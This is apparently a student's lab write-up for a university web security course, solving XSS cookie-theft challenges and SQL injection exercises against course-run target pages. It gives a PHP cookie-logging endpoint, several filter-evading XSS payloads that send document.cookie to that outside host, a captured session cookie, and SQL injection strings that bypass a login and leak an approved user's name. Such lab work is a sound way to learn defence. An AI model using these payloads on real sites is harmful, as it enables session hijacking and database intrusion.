Digital Log

    Lab 2

    Pikachu, Meowth, and Cookies

    First, we set up our homepages as recommended in the lab handout. This involves an index.php:

    <?php

echo "running file_put_contents with " . $_GET["cookie"];
echo "<br>";

$ret = file_put_contents("/cse/web/homes/tays/cookie.txt", "cookie: " . $_GET["cookie"]);

echo "did it work?";
echo "<br>";
echo "ret == $ret";

?>

    in addition to touching a blank cookies.txt file with 622 permissions. This infrastructure is used for all of the XSS problems below.

    Problem 1

    Doing the first problem was an exercise in figuring out the flow for XSS here. Eventually the correct payload looks like:

    wow so hacked</h2><script>window.location='https://homes.cs.washington.edu/~tays/?cookie='+document.cookie</script><br><h2>

    but this causes the exploit to work so that when you get redirected to the "Invalid Link" page, the (local) browser gets redirected to the cse homepage, getting our group's cookie, not the bots. So instead, we modified the input slightly:

    wow so hacked</h2><script>window.location='https://homes.cs.washington.edu/~tays/?cookie='+document.cookie</scrip><br><h2>

    notice the missing t on the closing </script> tag. Because the HTML isn't
    valid, it won't run and we get to remain on the current page. Then we grab the URL:

    https://cse484.cs.washington.edu/lab2/pmc/simple.php?url=wow+so+hacked%3C%2Fh2%3E%3Cscript%3Ewindow.location%3D%27https%3A%2F%2Fhomes.cs.washington.edu%2F%7Etays%2F%3Fcookie%3D%27%2Bdocument.cookie%3C%2Fscrip%3E%3Cbr%3E%3Ch2%3E

    and just add in the missing t to create the final payload:

    https://cse484.cs.washington.edu/lab2/pmc/simple.php?url=wow+so+hacked%3C%2Fh2%3E%3Cscript%3Ewindow.location%3D%27https%3A%2F%2Fhomes.cs.washington.edu%2F%7Etays%2F%3Fcookie%3D%27%2Bdocument.cookie%3C%2Fscript%3E%3Cbr%3E%3Ch2%3E

    Viola. The bot runs and we get cookie:
    authenticated=9e5bebeb7b743f1365b8e95fcf8788a5960b3554 saved to
    /cse/web/homes/tays/cookie.txt on the attu server.

    Then we used the Firefox storage inspector to set a cookie with name/value from above,
    and click the open safe box button. That solves Problem 1. (The rest of the problems are solved similarly, so I will be less verbose for those.)

    Problem 2

    To get around the script filter, we used body.onload:

    Solution:

    wow so hacked</h2><body onload="window.location='https://homes.cs.washington.edu/~tays/?cookie='+document.cookie;">body</body><h2>

    URL:

    https://cse484.cs.washington.edu/lab2/pmc/notsosimple.php?url=wow+so+hacked%3C%2Fh2%3E%3Cbody+onload%3D%22window.location%3D%27https%3A%2F%2Fhomes.cs.washington.edu%2F%7Etays%2F%3Fcookie%3D%27%2Bdocument.cookie%3B%22%3Ebody%3C%2Fbody%3E%3Ch2%3E

    Problem 3

    After many frustrating attempts around img src, meta tags, body tags, etc., eventually I found that iframe with a src set to javascript worked here. Some html entites were used to get around the string filters for javascript and on, as well as using / as a replacement for space characters.

    Solution:

    wow so hacked</h2><iframe/src="javas&#x0D;cript:window.locatio&#x0D;n='https://homes.cs.washingto&#x0D;n.edu/~tays/?cookie='+document.cookie;"/><h2>

    URL:

    https://cse484.cs.washington.edu/lab2/pmc/reallyhard.php?url=wow+so+hacked%3C%2Fh2%3E%3Ciframe%2Fsrc%3D%22javas%26%23x0D%3Bcript%3Awindow.locatio%26%23x0D%3Bn%3D%27https%3A%2F%2Fhomes.cs.washingto%26%23x0D%3Bn.edu%2F%7Etays%2F%3Fcookie%3D%27%2Bdocument.cookie%3B%22%2F%3E%3Ch2%3E

    Problem 4

    This one was also tricky! The end solution was to set the img src tag to be the malicious cookie eater website so that the browser would issue a GET request and reveal its cookie. This required setting an invalid src and using the onerror tag to set the src , concatenating the document.cookie value.

    Solution:

    hacked"/onerror="this.onerror=null;this.src='https://homes.cs.washingt&#111;n.edu/~tays/?cookie='+d&#111;cument.cookie;"/src="

    URL:

    https://cse484.cs.washington.edu/lab2/pmc/pie.php?url=wow+so+hacked%22%2Fonerror%3D%22this.onerror%3Dnull%3Bthis.src%3D%27https%3A%2F%2Fhomes.cs.washingt%26%23111%3Bn.edu%2F%7Etays%2F%3Fcookie%3D%27%2Bd%26%23111%3Bcument.cookie%3B%22%2Fsrc%3D%22

    Problem 5

    This was just like SQL injection but instead Javascript injection, just had to insert a substring to make valid malicious Javascript.

    Solution:

    asdf"; window.location='https://homes.cs.washington.edu/~tays/?cookie='+document.cookie; msg = "hacked

    I thought I would have to make a delay function to be able to grab the URL for this one, but I found it in my browser history.

    URL:

    https://cse484.cs.washington.edu/lab2/pmc/vikings.php?url=asdf%22%3B+window.location%3D%27https%3A%2F%2Fhomes.cs.washington.edu%2F%7Etays%2F%3Fcookie%3D%27%2Bdocument.cookie%3B+msg+%3D+%22hacked

    Problem 6

    This was pretty easy after Problem 5, just needed a different way to concat
    strings. Template strings get passed the filters just fine:

    asdf"; window.location=`https://homes.cs.washington.edu/~tays/?cookie=${document.cookie}`; msg = "hacked

    URL:

    https://cse484.cs.washington.edu/lab2/pmc/volleyball.php?url=asdf%22%3B+window.location%3D%60https%3A%2F%2Fhomes.cs.washington.edu%2F%7Etays%2F%3Fcookie%3D%24%7Bdocument.cookie%7D%60%3B+msg+%3D+%22hacked

    Jailbreak

    Problem 1

    First SQL injection was very easy. I don't recall exactly but it was one of the
    first attempts, something like:

    ' OR 'a'='a

    to just inject a boolean between the quotes to make the where clause evaluate to
    true.

    Problem 2

    This problem took me a while. I tried a number of things like new insert statements:

    '; insert into sql2 (name, approved) values ('sam', true); --

    but kept getting errors about mismatched column and value count.

    Then I tried a number of things that were doomed to fail because of Mysql being, in general, atrocious (why is Mysql still a thing? Postgres is better and also free?). Such things as:

    • No returning clauses
    • No insert/update mutation queries can be used within subqueries, even within CTEs.
    • No concat operators, just the CONCAT function. I actually tried to get around this with
    ', now()); SET sql_mode='ANSI'; --
', now());  SET sql_mode='PIPES_AS_CONCAT'; --

    to no avail.

    Eventually, while just trying to get more error messages to reveal more information, I ran:

    asdfasfasdfasdff', (select name from (select name from sql2 where approved limit 1) as t)); --

    thinking that I'd get an error about putting a text value into a timestamp column. Instead, the command actually succeeded. So when I then tried to submit a request for the user asdfasfasdfasdff, I got the error message:

    Hi asdfasfasdfasdff, unfortunately the request you submitted on Chicken Husky was not approved.

    so this string got saved to the timestamp column, and this string was the name of the user who had been approved by the warden! So I just entered the Chicken Husky name in the box and got through.